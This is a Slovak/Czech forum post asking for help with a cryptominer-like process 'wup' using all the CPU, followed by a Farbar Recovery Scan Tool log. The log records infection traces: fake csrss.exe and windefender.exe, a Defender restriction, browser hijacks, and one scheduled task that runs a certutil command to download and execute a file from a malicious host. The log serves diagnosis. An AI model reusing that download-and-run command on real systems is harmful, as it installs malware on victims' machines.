Dobry den, CPU využité na 100%, v spravcovi aktivne "wup"

Zpráva

mefisto88 · #1 Příspěvek od **mefisto88** » 26 úno 2020 09:50

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 23-02-2020
Ran by OKAY (administrator) on LAPTOP-FDEQH5KS (HP HP Laptop 15-bw0xx) (25-02-2020 22:17:40)
Running from C:\Users\OKAY\Desktop
Loaded Profiles: OKAY (Available Profiles: OKAY)
Platform: Windows 10 Home Version 1903 18362.592 (X64) Language: Slovenčina (Slovensko)
Default browser: Edge
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/33 ... scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

() [File not signed] C:\Program Files (x86)\IR\shutTask.exe
() [File not signed] C:\Program Files (x86)\Winamp\winampa.exe
() [File not signed] C:\Users\OKAY\AppData\Local\Temp\wup\wup.exe
() [File not signed] C:\Windows\rss\csrss.exe
() [File not signed] C:\Windows\windefender.exe
(Advanced Micro Devices, Inc. -> ) C:\Program Files\ATI Technologies\ATI.ACE\a4\AdaptiveSleepService.exe
(Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
(Advanced Micro Devices, Inc. -> AMD) C:\Windows\System32\DriverStore\FileRepository\c0328133.inf_amd64_4186281ba390473e\B325971\atieclxx.exe
(Advanced Micro Devices, Inc. -> AMD) C:\Windows\System32\DriverStore\FileRepository\c0328133.inf_amd64_4186281ba390473e\B325971\atiesrxx.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(ArcSoft, Inc. -> ArcSoft Inc.) C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACDaemon.exe
(ArcSoft, Inc. -> ArcSoft Inc.) C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACService.exe
(ArcSoft, Inc.) [File not signed] C:\Program Files (x86)\ArcSoft\TotalMedia 3.5\TMMonitor.exe
(EpicNet Inc.) [File not signed] C:\Users\OKAY\AppData\Local\Temp\csrss\cloudnet.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.35.442\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.35.442\GoogleCrashHandler64.exe
(HP Inc. -> HP Inc.) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
(HP Inc. -> HP Inc.) C:\Program Files (x86)\HP\HP JumpStart Bridge\HPJumpStartBridge.exe
(HP Inc. -> HP Inc.) C:\Program Files (x86)\HP\HP JumpStart Launch\HPJumpStartLaunch.exe
(HP Inc. -> HP Inc.) C:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe
(HP Inc. -> HP Inc.) C:\Program Files (x86)\HP\HPAudioSwitch\HPAudioSwitch.exe
(HP Inc. -> HP Inc.) C:\Program Files\HPCommRecovery\HPCommRecovery.exe
(LAVASOFT SOFTWARE CANADA INC -> ) C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe
(McAfee, LLC -> McAfee, Inc.) C:\Program Files\McAfee\WebAdvisor\servicehost.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Users\OKAY\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19081.22010.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12430.20136.0_x64__8wekyb3d8bbwe\HxTsr.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.WindowsStore_12001.1001.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\browser_broker.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\MicrosoftEdgeCP.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\MicrosoftEdgeSH.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Microsoft Windows Hardware Compatibility Publisher -> Realtek Semiconductor Corp.) C:\Windows\RtkBtManServ.exe
(Opera Software AS -> Opera Software) C:\Users\OKAY\AppData\Local\Programs\Opera\66.0.3515.72\opera.exe
(Opera Software AS -> Opera Software) C:\Users\OKAY\AppData\Local\Programs\Opera\66.0.3515.72\opera.exe
(Opera Software AS -> Opera Software) C:\Users\OKAY\AppData\Local\Programs\Opera\66.0.3515.72\opera.exe
(Opera Software AS -> Opera Software) C:\Users\OKAY\AppData\Local\Programs\Opera\66.0.3515.72\opera.exe
(Opera Software AS -> Opera Software) C:\Users\OKAY\AppData\Local\Programs\Opera\66.0.3515.72\opera.exe
(Opera Software AS -> Opera Software) C:\Users\OKAY\AppData\Local\Programs\Opera\66.0.3515.72\opera.exe
(Opera Software AS -> Opera Software) C:\Users\OKAY\AppData\Local\Programs\Opera\66.0.3515.72\opera.exe
(Opera Software AS -> Opera Software) C:\Users\OKAY\AppData\Local\Programs\Opera\66.0.3515.72\opera.exe
(Opera Software AS -> Opera Software) C:\Users\OKAY\AppData\Local\Programs\Opera\66.0.3515.72\opera.exe
(Opera Software AS -> Opera Software) C:\Users\OKAY\AppData\Local\Programs\Opera\66.0.3515.72\opera.exe
(Opera Software AS -> Opera Software) C:\Users\OKAY\AppData\Local\Programs\Opera\66.0.3515.72\opera.exe
(Opera Software AS -> Opera Software) C:\Users\OKAY\AppData\Local\Programs\Opera\66.0.3515.72\opera.exe
(Opera Software AS -> Opera Software) C:\Users\OKAY\AppData\Local\Programs\Opera\66.0.3515.72\opera.exe
(Opera Software AS -> Opera Software) C:\Users\OKAY\AppData\Local\Programs\Opera\66.0.3515.72\opera.exe
(Opera Software AS -> Opera Software) C:\Users\OKAY\AppData\Local\Programs\Opera\66.0.3515.72\opera.exe
(Opera Software AS -> Opera Software) C:\Users\OKAY\AppData\Local\Programs\Opera\66.0.3515.72\opera.exe
(Opera Software AS -> Opera Software) C:\Users\OKAY\AppData\Local\Programs\Opera\66.0.3515.72\opera.exe
(Opera Software AS -> Opera Software) C:\Users\OKAY\AppData\Local\Programs\Opera\66.0.3515.72\opera.exe
(Opera Software AS -> Opera Software) C:\Users\OKAY\AppData\Local\Programs\Opera\66.0.3515.72\opera.exe
(Opera Software AS -> Opera Software) C:\Users\OKAY\AppData\Local\Programs\Opera\66.0.3515.72\opera_crashreporter.exe
(Opera Software AS -> Opera Software) C:\Users\OKAY\AppData\Local\Programs\Opera\assistant\browser_assistant.exe
(Opera Software AS -> Opera Software) C:\Users\OKAY\AppData\Local\Programs\Opera\assistant\browser_assistant.exe
(Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Realtek Semiconductor Corp. -> Realtek) C:\Program Files (x86)\Realtek\PCIE Wireless LAN\RtlS5Wake\RtlS5Wake.exe
(Realtek Semiconductor Corp.) [File not signed] C:\Program Files (x86)\Realtek\REALTEK Bluetooth\BTDevMgr.exe
(Synaptics Incorporated -> Synaptics Incorporated) C:\Windows\System32\SynTPEnh.exe
(Synaptics Incorporated -> Synaptics Incorporated) C:\Windows\System32\SynTPEnhService.exe

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [9277520 2019-06-20] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM\...\Run: [boinctray] => C:\Program Files\BOINC\boinctray.exe [69952 2018-01-19] (Grid Republic (COMPUTATIONAL CHARITY PROJECT INC) -> Charity Engine)
HKLM\...\Run: [boincmgr] => C:\Program Files\BOINC\charityengine.exe [8662848 2018-01-19] (Grid Republic (COMPUTATIONAL CHARITY PROJECT INC) -> Charity Engine)
HKLM-x32\...\Run: [HPMessageService] => C:\Program Files (x86)\HP\HP System Event\HPMSGSVC.exe [703312 2017-07-21] (HP Inc. -> HP Inc.)
HKLM-x32\...\Run: [RtlS5Wake] => C:\Program Files (x86)\Realtek\PCIE Wireless LAN\RtlS5Wake\RtlS5Wake.exe [1660760 2017-06-26] (Realtek Semiconductor Corp. -> Realtek)
HKLM-x32\...\Run: [HPRadioMgr] => C:\Program Files (x86)\HP\HP Wireless Button Driver\HPRadioMgr64.exe [324592 2017-10-31] (HP Inc. -> HP)
HKLM-x32\...\Run: [ArcSoft Connection Service] => C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACDaemon.exe [170496 2009-02-06] (ArcSoft, Inc. -> ArcSoft Inc.)
HKLM-x32\...\Run: [shutTask] => C:\Program Files (x86)\IR\shutTask.exe [110592 2010-01-05] () [File not signed]
HKLM-x32\...\Run: [WinampAgent] => C:\Program Files (x86)\Winamp\Winampa.exe [12288 2003-04-02] () [File not signed]
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-3379079519-2247991655-2019407835-1001\...\Run: [Opera Browser Assistant] => C:\Users\OKAY\AppData\Local\Programs\Opera\assistant\browser_assistant.exe [3024408 2020-02-24] (Opera Software AS -> Opera Software)
HKU\S-1-5-21-3379079519-2247991655-2019407835-1001\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\WINDOWS\system32\Mystify.scr [152576 2019-03-19] (Microsoft Windows -> Microsoft Corporation)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\79.0.3945.130\Installer\chrmstp.exe [2020-01-22] (Google LLC -> Google LLC)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\TMMonitor.lnk [2019-05-15]
ShortcutTarget: TMMonitor.lnk -> C:\Program Files (x86)\ArcSoft\TotalMedia 3.5\TMMonitor.exe (ArcSoft, Inc.) [File not signed]
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\updateSteam.bat [2018-02-03] () [File not signed]
Startup: C:\Users\OKAY\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Facebook Gameroom.lnk [2018-07-21]
ShortcutTarget: Facebook Gameroom.lnk -> C:\Users\OKAY\AppData\Local\Facebook\Games\FacebookGameroom.exe (Facebook, Inc. -> Facebook) [File not signed]

==================== Scheduled Tasks (Whitelisted) ============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {094E0D9E-E9DB-452E-946E-B27683DF1DA0} - System32\Tasks\Opera scheduled assistant Autoupdate 1559853232 => C:\Users\OKAY\AppData\Local\Programs\Opera\launcher.exe [1532952 2020-02-05] (Opera Software AS -> Opera Software)
Task: {0B3BC1BF-D5C4-4DB4-B48D-7F0301BC66A0} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [115024 2020-02-25] (Microsoft Corporation -> Microsoft Corporation)
Task: {13244B01-81EF-4CFB-B95B-5C7E54D4C022} - System32\Tasks\GarminUpdaterTask => C:\Program Files (x86)\Garmin\Express SelfUpdater\ExpressSelfUpdater.exe [40432 2019-06-18] (Garmin International, Inc. -> )
Task: {1821277B-7577-4CB7-A199-D1325C563CDC} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://bestblues.tech/app/app.exe C:\Users\OKAY\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\OKAY\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
Task: {20453AB9-C426-487A-B4CC-8C372DCEDC42} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe [145272 2019-10-31] (HP Inc. -> HP Inc.)
Task: {2FE9D757-7FDC-4BB8-B294-21CFAA208240} - System32\Tasks\csrss => C:\WINDOWS\rss\csrss.exe [3964928 2020-02-11] () [File not signed] <==== ATTENTION
Task: {31BF0D8E-7B0C-4AF3-9C34-AC4FD39900ED} - System32\Tasks\HPEA3JOBS => C:\Program [Argument = Files\HP\HP ePrint\hpeprint.exe /CheckJobs]
Task: {360EA2E7-9D6F-4FD6-8506-26FE30C485FE} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\AVAST Software\Overseer\overseer.exe [1835112 2020-02-25] (Avast Software s.r.o. -> AVAST Software)
Task: {405BD723-A5D4-4703-9553-2E1EF882B841} - System32\Tasks\HPJumpStartLaunch => C:\Program Files (x86)\HP\HP JumpStart Launch\HPJumpStartLaunch.exe [461824 2017-10-06] (HP Inc. -> HP Inc.)
Task: {46D392A3-DA1A-4383-ADAD-F10376334A37} - System32\Tasks\HPAudioSwitch => C:\Program Files (x86)\HP\HPAudioSwitch\HPAudioSwitch.exe [1644960 2017-02-02] (HP Inc. -> HP Inc.)
Task: {4F0A315D-5FFB-4A59-9B12-B247FCFAD035} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-06-04] (Google Inc -> Google Inc.)
Task: {6430ED92-B0DA-4538-B39C-3FE60030260A} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [655736 2019-07-31] (HP Inc. -> HP Inc.)
Task: {70CFD1EC-023C-4974-922F-D4B612E9E0A4} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-06-04] (Google Inc -> Google Inc.)
Task: {80FEC5DE-2D2E-4BD1-B8B5-23614007C355} - System32\Tasks\Opera scheduled Autoupdate 1557961584 => C:\Users\OKAY\AppData\Local\Programs\Opera\launcher.exe [1532952 2020-02-05] (Opera Software AS -> Opera Software)
Task: {92D723C2-364D-4440-955F-BCA1D0CD9209} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerLogon => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [1353616 2020-02-25] (Microsoft Corporation -> Microsoft Corporation)
Task: {A718DE96-0137-4781-951D-53F3BABB0B9A} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [14544792 2018-10-23] (Piriform Software Ltd -> Piriform Ltd)
Task: {A785CD2F-513D-4942-BF30-A47189A32F5D} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [49032 2018-04-02] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
Task: {A7DBE77E-7C45-4FCD-979D-C08A229AF744} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerRegistration => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [1353616 2020-02-25] (Microsoft Corporation -> Microsoft Corporation)
Task: {AF1D55A5-89E3-4327-815B-B9FD6D1095E7} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [24568696 2020-02-12] (Microsoft Corporation -> Microsoft Corporation)
Task: {C5F68CE8-F6F5-4E3E-B50B-62A89A9AEE36} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [115024 2020-02-25] (Microsoft Corporation -> Microsoft Corporation)
Task: {C77B75B2-08AB-4D46-8C68-D45C8B7ED161} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [619416 2019-02-04] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {DF1E1823-7057-4BB0-8218-10FE85F3B14E} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [24568696 2020-02-12] (Microsoft Corporation -> Microsoft Corporation)
Task: {FE21587B-F637-407B-BCB9-09B145D9A2F0} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonx86\Microsoft Shared\Office16\OLicenseHeartbeat.exe [1448840 2020-02-25] (Microsoft Corporation -> Microsoft Corporation)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.1.1 195.146.128.62
Tcpip\..\Interfaces\{eaa0e4cc-c870-4628-b379-1f02ba2ec14d}: [DhcpNameServer] 192.168.1.1 195.146.128.62

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://hp17win10.msn.com/?pc=HCTE
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://hp17win10.msn.com/?pc=HCTE
HKU\S-1-5-21-3379079519-2247991655-2019407835-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://securesearch.org/homepage?hp=2&pId=BT171101&iDate=2020-02-11 01:07:07&bName=
HKU\S-1-5-21-3379079519-2247991655-2019407835-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://hp17win10.msn.com/?pc=HCTE
SearchScopes: HKLM -> {9FF500FA-34DC-42C9-96B6-47795ACBB947} URL = hxxp://www.amazon.co.uk/s/ref=azs_osd_ieauk?ie ... earchTerms}
SearchScopes: HKLM-x32 -> {9FF500FA-34DC-42C9-96B6-47795ACBB947} URL = hxxp://www.amazon.co.uk/s/ref=azs_osd_ieauk?ie ... earchTerms}
SearchScopes: HKU\S-1-5-21-3379079519-2247991655-2019407835-1001 -> {993F5746-4C15-42BC-99C1-064A1764271B} URL = hxxps://securesearch.org?q={searchTerms}
SearchScopes: HKU\S-1-5-21-3379079519-2247991655-2019407835-1001 -> {9FF500FA-34DC-42C9-96B6-47795ACBB947} URL = hxxp://www.amazon.co.uk/s/ref=azs_osd_ieauk?ie ... earchTerms}
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2020-01-11] (Microsoft Corporation -> Microsoft Corporation)
BHO: McAfee WebAdvisor -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> C:\Program Files\McAfee\WebAdvisor\x64\IEPlugin.dll [2019-09-04] (McAfee, LLC -> McAfee, Inc.)
BHO: No Name -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> No File
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\Office16\OCHelper.dll [2020-01-11] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: McAfee WebAdvisor -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> C:\Program Files\McAfee\WebAdvisor\win32\IEPlugin.dll [2019-09-04] (McAfee, LLC -> McAfee, Inc.)
BHO-x32: No Name -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> No File
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-02-05] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-02-05] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-02-05] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-02-05] (Microsoft Corporation -> Microsoft Corporation)
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\PROGRA~2\mcafee\SITEAD~1\mcieplg.dll No File

Edge:
======
DownloadDir: C:\Users\OKAY\Downloads
Edge Notifications: HKU\S-1-5-21-3379079519-2247991655-2019407835-1001 -> hxxps://cracked-torrent.org

FireFox:
========
FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files\McAfee\WebAdvisor\e10ssaffplg.xpi
FF Extension: (McAfee® WebAdvisor) - C:\Program Files\McAfee\WebAdvisor\e10ssaffplg.xpi [2019-09-04]
FF HKLM-x32\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files\McAfee\WebAdvisor\e10ssaffplg.xpi
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2019-12-09] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2020-01-11] (Microsoft Corporation -> Microsoft Corporation)

Chrome:
=======
CHR Profile: C:\Users\OKAY\AppData\Local\Google\Chrome\User Data\Default [2020-02-11]
CHR HomePage: Default -> hxxp://www.mysearchresults.com/?c=3523&t=01
CHR Extension: (Prezentácie) - C:\Users\OKAY\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-06-04]
CHR Extension: (Dokumenty) - C:\Users\OKAY\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2018-06-04]
CHR Extension: (Disk Google) - C:\Users\OKAY\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-06-04]
CHR Extension: (YouTube) - C:\Users\OKAY\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-06-04]
CHR Extension: (Tabuľky) - C:\Users\OKAY\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-06-04]
CHR Extension: (McAfee® WebAdvisor) - C:\Users\OKAY\AppData\Local\Google\Chrome\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2019-11-28]
CHR Extension: (Dokumenty Google v režime offline) - C:\Users\OKAY\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2020-02-10]
CHR Extension: (AdBlock — best ad blocker) - C:\Users\OKAY\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2020-02-11]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\OKAY\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-10-08]
CHR Extension: (Gmail) - C:\Users\OKAY\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-05-15]
CHR Extension: (Chrome Media Router) - C:\Users\OKAY\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-02-11]
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho]
CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho]

Opera:
=======
OPR Notifications: hxxps://serialy.bombuj.eu; hxxps://www.freefilm.to

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 ACDaemon; C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACService.exe [109056 2009-02-06] (ArcSoft, Inc. -> ArcSoft Inc.)
R2 AdaptiveSleepService; C:\Program Files\ATI Technologies\ATI.ACE\A4\AdaptiveSleepService.exe [155016 2018-04-02] (Advanced Micro Devices, Inc. -> )
R2 AMD External Events Utility; C:\WINDOWS\System32\DriverStore\FileRepository\c0328133.inf_amd64_4186281ba390473e\B325971\atiesrxx.exe [489832 2018-07-05] (Advanced Micro Devices, Inc. -> AMD)
R2 BTDevManager; C:\Program Files (x86)\REALTEK\Realtek Bluetooth\BTDevMgr.exe [127488 2017-08-30] (Realtek Semiconductor Corp.) [File not signed]
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [11096648 2020-02-12] (Microsoft Corporation -> Microsoft Corporation)
R2 HP Comm Recover; C:\Program Files\HPCommRecovery\HPCommRecovery.exe [1327400 2017-09-05] (HP Inc. -> HP Inc.)
R2 HPJumpStartBridge; c:\Program Files (x86)\HP\HP JumpStart Bridge\HPJumpStartBridge.exe [477184 2017-10-06] (HP Inc. -> HP Inc.)
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [361848 2019-12-06] (HP Inc. -> HP Inc.)
R2 HPWMISVC; c:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe [628768 2017-07-13] (HP Inc. -> HP Inc.)
R2 McAfee WebAdvisor; C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe [905472 2019-09-04] (McAfee, LLC -> McAfee, Inc.)
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [267552 2019-06-20] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
R2 RtkBtManServ; C:\WINDOWS\RtkBtManServ.exe [738712 2019-11-30] (Microsoft Windows Hardware Compatibility Publisher -> Realtek Semiconductor Corp.)
R2 SynTPEnhService; C:\WINDOWS\System32\SynTPEnhService.exe [382008 2019-08-15] (Synaptics Incorporated -> Synaptics Incorporated)
R2 WCAssistantService; C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe [29272 2020-02-11] (LAVASOFT SOFTWARE CANADA INC -> )
S3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1904.1-0\NisSrv.exe [3851264 2019-04-24] (Microsoft Corporation -> Microsoft Corporation)
S3 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1904.1-0\MsMpEng.exe [118144 2019-04-24] (Microsoft Corporation -> Microsoft Corporation)
R2 WinDefender; C:\WINDOWS\windefender.exe [2079744 2020-02-11] () [File not signed]
U3 wuauserv; C:\WINDOWS\system32\svchost.exe [53744 2019-03-19] (Microsoft Windows Publisher -> Microsoft Corporation) <==== ATTENTION (no ServiceDLL)
U3 wuauserv; C:\WINDOWS\SysWOW64\svchost.exe [45448 2019-03-19] (Microsoft Windows Publisher -> Microsoft Corporation) <==== ATTENTION (no ServiceDLL)

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 AmdAS4; C:\WINDOWS\System32\drivers\AmdAS4.sys [26984 2018-07-05] (Advanced Micro Devices Inc. -> Advanced Micro Devices, INC.)
R3 amdkmdag; C:\WINDOWS\System32\DriverStore\FileRepository\c0328133.inf_amd64_4186281ba390473e\B325971\atikmdag.sys [40413544 2018-07-05] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
R3 amdkmdap; C:\WINDOWS\System32\DriverStore\FileRepository\c0328133.inf_amd64_4186281ba390473e\B325971\atikmpag.sys [553832 2018-07-05] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
R0 amdpsp; C:\WINDOWS\System32\drivers\amdpsp.sys [145792 2018-07-05] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc. )
R3 AtiHDAudioService; C:\WINDOWS\system32\drivers\AtihdWT6.sys [111112 2018-07-05] (Microsoft Windows Hardware Compatibility Publisher -> Advanced Micro Devices)
S3 MBAMSwissArmy; C:\WINDOWS\System32\Drivers\mbamswissarmy.sys [260480 2018-11-13] (Malwarebytes Corporation -> Malwarebytes)
R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [1009128 2017-08-25] (Realtek Semiconductor Corp. -> Realtek )
R3 RtkBtFilter; C:\WINDOWS\System32\drivers\RtkBtfilter.sys [787232 2019-11-30] (WDKTestCert VSAuto,131800073559665678 -> Realtek Semiconductor Corporation)
